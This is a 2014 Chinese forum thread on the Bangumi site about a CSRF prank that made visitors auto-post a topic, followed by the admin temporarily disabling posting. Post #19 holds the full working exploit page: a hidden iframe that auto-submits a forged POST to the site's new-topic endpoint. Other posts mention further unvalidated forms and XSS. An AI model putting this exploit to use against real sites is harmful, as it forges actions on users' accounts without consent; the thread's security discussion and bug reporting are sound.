#1 - 2014-4-19 20:56
#2 - 2014-4-19 21:00
(null)
(bgm38)
怎么实现的……
#2-1 - 2014-4-19 21:00
upsuper
直接看代码不就好了(
#2-2 - 2014-4-19 21:01
原来的头像呢
upsuper 说: 直接看代码不就好了(
直接跳转了好不喂!而且难到在发一回吗(bgm38)
还有都被你刷屏了啊喂!
你看看好多人中枪了啊!
#2-3 - 2014-4-19 21:03
upsuper
OtakuThinking 说: 直接跳转了好不喂!
还有都被你刷屏了啊喂!
你看看好多人中枪了啊!
嘛,如果都不知道该怎么看到这个代码……我觉得你大概看了也不知道是怎么实现的……
另外没看到几个中枪的啊(
#2-4 - 2014-4-19 21:04
原来的头像呢
upsuper 说: 嘛,如果都不知道该怎么看到这个代码……我觉得你大概看了也不知道是怎么实现的……
另外没看到几个中枪的啊(
已经被你刷屏了啊喂(bgm38)
那就先从怎么看到代码开始教学吧=w=……
资料也行……
#2-5 - 2014-4-19 21:06
upsuper
OtakuThinking 说: 已经被你刷屏了啊喂
那就先从怎么看到代码开始教学吧=w=……
资料也行……
楼下已经有人给了
#2-6 - 2014-4-19 21:14
upsuper
yzyzsun 说: <!DOCTYPE html>
<html>
<head>
&nbsp;&nbsp;<meta charset="UTF-8">
&nbsp;&nbsp;<title></title>
&nbsp;&...
直接贴出来多没意思
#2-7 - 2014-4-19 21:15
原来的头像呢
yzyzsun 说: <!DOCTYPE html>
<html>
<head>
&nbsp;&nbsp;<meta charset="UTF-8">
&nbsp;&nbsp;<title></title>
&nbsp;&...
已经看到了
正在配合W3慢慢啃
#3 - 2014-4-19 21:02
(Boom!)
#3-1 - 2014-4-19 21:06
upsuper
嗯,这只是1
#3-2 - 2014-4-19 21:14
糯米团子
upsuper 说: 嗯,这只是1
前面加了日期的话翻不到其他的...

一般我都新开个IE打开这种页面(bgm38)
#3-3 - 2014-4-19 21:17
upsuper
四叠半糯米团子 说: 前面加了日期的话翻不到其他的...

一般我都新开个IE打开这种页面
确实没发其他的,等sai把这个补了我再看看还有没漏网的再来玩
#4 - 2014-4-19 21:04
(买漫画切记远离烂店“漫爵”&“神话典传” ...)
自重(
#5 - 2014-4-19 21:04
其实我觉得跳转回所发出的帖子是一个非常不明智的选择,因为这导致你们有更大的概率直接删除(
#6 - 2014-4-19 21:04
(已转职为地球人)
假装中枪(bgm24)
#7 - 2014-4-19 21:05
其实这样洗版的话后来人都不会点了(
#7-1 - 2014-4-19 21:06
原来的头像呢
不,我们把这个顶上去就行了……(bgm38)
#8 - 2014-4-19 21:07
我也中枪了
#8-1 - 2014-4-19 21:07
upsuper
你们看到这么多贴还敢点的都是在卖萌吧(
#8-2 - 2014-4-19 21:33
orange
upsuper 说: 你们看到这么多贴还敢点的都是在卖萌吧(
刚才我下载了网页看了一下,但是我根本看不懂。是javascript吗,为什么会这样?
#8-3 - 2014-4-19 21:34
upsuper
orange 说: 刚才我下载了网页看了一下,但是我根本看不懂。是javascript吗,为什么会这样?
嘛……关键词 csrf 你搜一下就知道了
#8-4 - 2014-4-19 21:37
orange
upsuper 说: 嘛……关键词 csrf 你搜一下就知道了
(bgm38)
#8-5 - 2014-4-19 23:04
原来的头像呢
upsuper 说: 嘛……关键词 csrf 你搜一下就知道了
感觉现在的状况已经可以算作吵闹攻击了吧……
好像变慢好多是我的错觉吗?
#8-6 - 2014-4-19 23:06
upsuper
OtakuThinking 说: 感觉现在的状况已经可以算作吵闹攻击了吧……
好像变慢好多是我的错觉吗?
本来就是攻击啊,只不过没什么严重的危害而已(
#8-7 - 2014-4-19 23:08
原来的头像呢
upsuper 说: 本来就是攻击啊,只不过没什么严重的危害而已(
本来的性质只是“发一些奇怪的东西”吧……
然后现在大家觉得奇怪然后多点了几次然后就被刷屏了(bgm38)
我感觉这样变得稍微有些奇怪了……原来不是吵闹攻击的样子……
#9 - 2014-4-19 21:13
我感觉这个能炸出一些潜水的(
#9-1 - 2014-4-19 21:17
树洞酱
呵呵。
#9-2 - 2014-4-19 21:17
默不作声的结城照美(仮)
(bgm39)一开始觉得你真是来乱的,看到这句突然觉得瑕不掩瑜啊!
#9-3 - 2014-4-19 21:19
#9-4 - 2014-4-19 21:19
upsuper
金玉其外的结城照美(仮) 说: 一开始觉得你真是来乱的,看到这句突然觉得瑕不掩瑜啊!
其实这个炸潜水的能力还不强,发了能删,要有发了不能删的才好
#9-5 - 2014-4-19 21:44
chaucer
upsuper 说: 其实这个炸潜水的能力还不强,发了能删,要有发了不能删的才好
有没有留言的bug,如果有的话,发了立刻回复就不能删了
#9-6 - 2014-4-19 21:46
upsuper
chaucer绫 说: 有没有留言的bug,如果有的话,发了立刻回复就不能删了
我不会告诉你现在其实真的是可以的
#10 - 2014-4-19 21:16
(bgm38)好神奇
#11 - 2014-4-19 21:17
#12 - 2014-4-19 21:18
如果这个技能被广告姬学会的话(bgm38)
#12-1 - 2014-4-19 21:20
默不作声的结城照美(仮)
快住嘴!会被麻将姬听到的啊!!
#12-2 - 2014-4-19 21:23
原来的头像呢
金玉其外的结城照美(仮) 说: 快住嘴!会被麻将姬听到的啊!!
+1
#12-3 - 2014-4-20 22:01
自動麻將姬
金玉其外的结城照美(仮) 说: 快住嘴!会被麻将姬听到的啊!!
咕嘿嘿(bgm25)
#12-4 - 2014-4-20 22:04
默不作声的结城照美(仮)
自動麻將姬 说: 咕嘿嘿
谁家马甲 快领回家!
#13 - 2014-4-19 21:41
(Ruby ❤ Sapphire)
bgm之前不是所有post都加token了么。。。
大白兔这么玩,在v2ex说不定就被livid给改掉密码了。。。
另外v2ex的抗csrf非常奇异,token都是一次性不同步的,同时开几个帖子后,ajax和回复操作就会异常。。。
#13-1 - 2014-4-19 21:44
upsuper
然后就改不回去了?咱相信 sai 不会那么坏(
有很多漏网之鱼的说,但是这次这个地方可以搞真是有点出乎我意料
#13-2 - 2014-4-19 21:47
谷米
upsuper 说: 然后就改不回去了?咱相信 sai 不会那么坏(
有很多漏网之鱼的说,但是这次这个地方可以搞真是有点出乎我意料
可以改回去。。。之前v2ex就有人和livid意见不合啦过几天就发现登录不了,重置密码后过几天又登录不了,超奇怪的处理。。。(今天我还看到livid很严肃地回复了一个跟他开玩笑的帖子。。。)
#13-3 - 2014-4-19 21:48
upsuper
Ruby 说: 可以改回去。。。之前v2ex就有人和livid意见不合啦过几天就发现登录不了,重置密码后过几天又登录不了,超奇怪的处理。。。(今天我还看到livid很严肃地回复了一个跟他开玩笑的帖子。。。)
感觉像小孩子闹脾气一样 233
#14 - 2014-4-19 21:43
打開之後在後台 AJAX 不斷在自己的帖子上提交回覆不是更好玩(喂
#14-1 - 2014-4-19 21:45
upsuper
ajax 是做不到的哦,因为有跨域限制
#14-2 - 2014-4-19 21:46
ビノタ
upsuper 说: ajax 是做不到的哦,因为有跨域限制
對哦=w="" 那就換別的方法((
#14-3 - 2014-4-19 21:48
ビノタ
BinotaLiu 说: 對哦=w="" 那就換別的方法((
仔細想想的話……早知道上次那個 XSS 就不提交了(大霧

http://bgm.tv/group/topic/30727
#14-4 - 2014-4-19 21:53
upsuper
BinotaLiu 说: 仔細想想的話……早知道上次那個 XSS 就不提交了(大霧

http://bangumi.tv/group/topic/30727
喔喔,xss 比 csrf 找起来麻烦呢,不过危害大得多的说
#14-5 - 2014-4-19 22:13
ビノタ
upsuper 说: 喔喔,xss 比 csrf 找起来麻烦呢,不过危害大得多的说
這麼說來的話…… CSRF 的修補跟 XSS 比起來呢?
#14-6 - 2014-4-19 22:17
upsuper
BinotaLiu 说: 這麼說來的話…… CSRF 的修補跟 XSS 比起來呢?
虽然麻烦一些但差别不大啦
#15 - 2014-4-19 21:49
(双目失明丝毫不影响我上BGM)
总觉得点下去就没办法回头了……
#15-1 - 2014-4-19 21:54
upsuper
回的了头,轻轻一点 del 即可
#15-2 - 2014-4-20 20:41
心心 累孓不爱
upsuper 说: 回的了头,轻轻一点 del 即可
所以昨天后悔点了del,后来发现洗版了,我辛辛苦苦删除自己中枪的帖子作甚
#16 - 2014-4-19 22:12
(Q, Σ, Γ, δ, q0, Z0, F)
果然很好玩!
#16-1 - 2014-4-19 22:13
原来的头像呢
被你刷屏了(bgm38)
#17 - 2014-4-19 22:22
(霍克prpr)
(bgm38)(bgm38)
#18 - 2014-4-19 22:33
(null)
你们不召唤一下赛大吗……
#19 - 2014-4-19 22:35
(Q, Σ, Γ, δ, q0, Z0, F)
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title></title>
  <style type="text/css">
    iframe { border: 0 none; }
  </style>
</head>
<body onload="doit()">
  <p>载入中,请稍后……</p>
  <iframe id="iframe" width="0" height="0" src="about:blank"></iframe>
  <script type="text/javascript">
    var bgm_domain = /b(bangumi.tv|bgm.tv|chii.in)b/;
    var domain = document.referrer.match(bgm_domain);
    domain = domain ? domain[0] : 'bangumi.tv';
    var $iframe = document.getElementById("iframe");
    function doit() {
      $iframe.contentWindow.document.body.innerHTML =
        '<form action="http://' + domain + '/group/364/topic/new"' +
        ' method="POST" id="form" target="_parent">n' +
        '<input name="title" value="因为很好玩所以决定试一试">n' +
        '<input name="content" value="嗯嗯~ [url]http://t.cn/8sjGJgk[/url]">n' +
        '</form>';
      $iframe.contentWindow.document.getElementById('form').submit();
    }
  </script>
</body>
</html>
#19-1 - 2014-4-19 22:38
fantasy
@Sai
怎么样改可以使每多点一次加一个”再"?
#20 - 2014-4-19 23:10
W3M点击无反应,是BUG吗(bgm88)
#20-1 - 2014-4-19 23:12
#21 - 2014-4-20 00:48
(Awesome!)
好麻烦,关闭发帖好了。
#21-1 - 2014-4-20 05:30
upsuper
(bgm38) sai 大我错了
#21-2 - 2014-4-20 09:00
upsuper
话说 sai 大把移动版进度管理里面书籍的收藏按钮的链接也加上 mode=mobile 吧,这个应该很简单的
#21-3 - 2014-4-20 19:47
upsuper
个人设置页虽然有放 formhash 但是没有进行验证,赶快改一下吧。这个感觉很危险,我就不玩了。因为私信貌似用不了了,所以就在这里发了……
#21-4 - 2014-4-20 20:39
#22 - 2014-4-20 00:56
貌似 opera mini 免疫(bgm38)
#22-1 - 2014-4-20 05:39
upsuper
看你楼上(
#23 - 2014-4-20 01:07
(hhh汝视视汝)
(bgm38)
#24 - 2014-4-20 01:56
(低头做事)
发帖量超大的事故终于实现了,是好事
#25 - 2014-4-20 08:20
(我们正和太阳并肩作战!)
没看懂啊……
#25-1 - 2014-4-20 08:28
upsuper
因为已经不能发新帖了(
#25-2 - 2014-4-20 08:38
ビノタ
upsuper 说: 因为已经不能发新帖了(
既然不能發新帖,就改成發回復再這樓吧(
#25-3 - 2014-4-20 08:38
tora
upsuper 说: 因为已经不能发新帖了(
还是没看懂啊~
#25-4 - 2014-4-20 08:42
upsuper
BinotaLiu -- '_&gt;` 说: 既然不能發新帖,就改成發回復再這樓吧(
哦,也好,我去改一下吧
#25-5 - 2014-4-20 08:49
ビノタ
upsuper 说: 哦,也好,我去改一下吧
是我的错觉还是引用真的会对HTML字符转译两次(bgm38)
#25-6 - 2014-4-20 08:51
upsuper
BinotaLiu -- '_&gt;` 说: 是我的错觉还是引用真的会对HTML字符转译两次
转义这种小 bug 太多了……
话说那个漏洞被休掉了呢,改晚了w
#25-7 - 2014-4-20 08:55
ビノタ
upsuper 说: 转义这种小 bug 太多了……
话说那个漏洞被休掉了呢,改晚了w
一直觉得Bangumi 的转译很奇怪……
现在知道是写入数据库前一定会有一次分号的转译,
可是昨天又发现在某些地方,
打印前又做了一次分号的转译(打印前转译分号就没用了吧
#25-8 - 2014-4-20 08:59
upsuper
BinotaLiu -- '_&gt;` 说: 一直觉得Bangumi 的转译很奇怪……
现在知道是写入数据库前一定会有一次分号的转译,
可是昨天又发现在某些地方,
打印前又做了一次分号的转译(打印前转译分号就没用了吧
分号?我倒是发现斜杠的转义很诡异……
#25-9 - 2014-4-20 09:04
ビノタ
upsuper 说: 分号?我倒是发现斜杠的转义很诡异……
我的 ID 后 -- '_>` 在时空管理局会变 -- '_>`
斜杠怎么样诡异?
#25-10 - 2014-4-20 09:06
ビノタ
BinotaLiu -- '_&gt;` 说: 我的 ID 后 -- '_>` 在时空管理局会变 -- '_>`
斜杠怎么样诡异?
等等我發現现在沒辦法编辑了……  --\ '_>`  会变這個才对,忘了斜杠要打两次
#25-11 - 2014-4-20 09:07
upsuper
BinotaLiu -- '_&gt;` 说: 我的 ID 后 -- '_>` 在时空管理局会变 -- '_>`
斜杠怎么样诡异?
啊应该是反斜杠
你看 #19 的代码你就会发现里面的反斜杠全都丢失了,如果想要打出反斜杠的话要两个反斜杠,而且你编辑的时候会发现两个反斜杠又变成一个了,你如果不补一个,保存的时候就会消失(
#25-12 - 2014-4-20 09:07
upsuper
BinotaLiu -- '_&gt;` 说: 等等我發現现在沒辦法编辑了……&nbsp;&nbsp;-- '_>`&nbsp;&nbsp;会变這個才对,忘了斜杠要打两次
对,暂时没法编辑了,应该是修漏洞的时候一些功能受到影响了
#25-13 - 2014-4-20 09:09
ビノタ
upsuper 说: 啊应该是反斜杠
你看 #19 的代码你就会发现里面的反斜杠全都丢失了,如果想要打出反斜杠的话要两个反斜杠,而且你编辑的时候会发现两个反斜杠又变成一个了,你如果不补一个,保存的时候就会消失(
感觉程序写法不明(
Sai 大怎么不找几个自愿者做维护……Bangumi 里各种人才啊(bgm38)
#25-14 - 2014-4-20 09:11
ビノタ
upsuper 说: 对,暂时没法编辑了,应该是修漏洞的时候一些功能受到影响了
然后引用的时候,反斜杠又消失了……简直无法直视
#26 - 2014-4-20 08:43
(VIP已到期,请尽快续费)
玩了这么多年还没腻……搞得我现在还要亲自上来给新番打分吐槽……(bgm41)
#26-1 - 2014-4-20 08:44
upsuper
多好玩啊ww
#26-2 - 2014-4-20 08:47
若卡
upsuper 说: 多好玩啊ww
来晚了,让他们发了什么……“诸君,我是个超M的变态,请让我舔脚吧!” 这样的么
#26-3 - 2014-4-20 08:49
upsuper
若卡 说: 来晚了,让他们发了什么……“诸君,我是个超M的变态,请让我舔脚吧!” 这样的么
没有啦,就是按照这贴的模板发的,实际上这贴也是我自己点的(
#26-4 - 2014-4-20 08:52
upsuper
若卡 说: 来晚了,让他们发了什么……“诸君,我是个超M的变态,请让我舔脚吧!” 这样的么
#19 把代码都贴出来了
#27 - 2014-4-20 08:47
看代码的话似乎不少地方的漏洞都已经补了呢,真是效率(
#28 - 2014-4-20 09:38
(爱动漫,宅!‮‮‮‮‮‮‮‮‮‮‮‮ ... ... )
学姐要玩脱啦~ (bgm38)
#29 - 2014-4-20 19:38
终于恢复发帖了~
#29-1 - 2014-4-20 20:43
心心 累孓不爱
(bgm38)所以说……
#29-2 - 2014-4-20 22:05
默不作声的结城照美(仮)
等等,还真的关闭发帖了???!!
#29-3 - 2014-4-20 22:19
upsuper
金玉其外的结城照美(仮) 说: 等等,还真的关闭发帖了???!!
真的哦
#29-4 - 2014-4-20 22:21
Sai🖖
upsuper 说: 真的哦
没有哦,肯定是你打开方式不对。